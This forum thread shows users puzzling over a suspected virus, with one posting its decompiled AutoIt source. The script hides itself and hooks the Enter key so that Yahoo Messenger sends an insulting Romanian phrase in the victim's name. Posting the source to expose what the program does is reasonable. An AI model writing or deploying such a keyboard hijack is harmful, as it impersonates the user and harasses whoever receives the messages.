Jump to content

Source Code?


Dr. Doom
 Share

Recommended Posts

no one will look into your programm..

no one will trust you....

LOL, I just tried it at school, I think it's a virus but it didn't do anything, no CPU usage, no gui, it looks like it just sits there.

Whats this Virus suppossed to do???

[center]AutoIT + Finger Print Reader/Scanner = COOL STUFF -> Check Out Topic![/center][center][font=Arial Black]Check out ConsultingJoe.com[/font][/center][center]My Scripts~~~~~~~~~~~~~~Web Protocol Managing - Simple WiFi Scanner - AutoTunes - Remote PC Control V2 - Audio SpectrascopePie Chart UDF - At&t's TTS - Custom Progress Bar - Windows Media Player Embed[/center]

Link to comment
Share on other sites

; <AUT2EXE VERSION: 3.1.1.0>

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: D:\WINDOWS\Desktop\autoIT\super-tare.AU3>
; ----------------------------------------------------------------------------

opt("WinTitleMatchMode", 4)
#NoTrayIcon

HotKeySet("{ENTER}", "ff")
HotKeySet("!dc", "iesi")


while 1
sleep(300)
wend



Func ff()
  ;ControlSetText("Untitled", "", "Edit1", "This is a line of text in the notepad window")
    HotKeySet("{ENTER}")
$bb=WinGetHandle("classname=IMClass")
ControlSetText($bb, "", "YIMInputWindow1", "Sunt tarfa" )
send("{ENTER}")
HotKeySet("{ENTER}", "ff")
EndFunc

Func iesi()
exit
EndFunc

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: D:\WINDOWS\Desktop\autoIT\super-tare.AU3>
; ----------------------------------------------------------------------------

blub......

KEK :think:

Edited by Busti
My UDF's : Startet on : 06.06.2006_CaseSearchOrReplaceStr();~> Searches OR Replaces a String,;~> With or Without Casesensivity
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...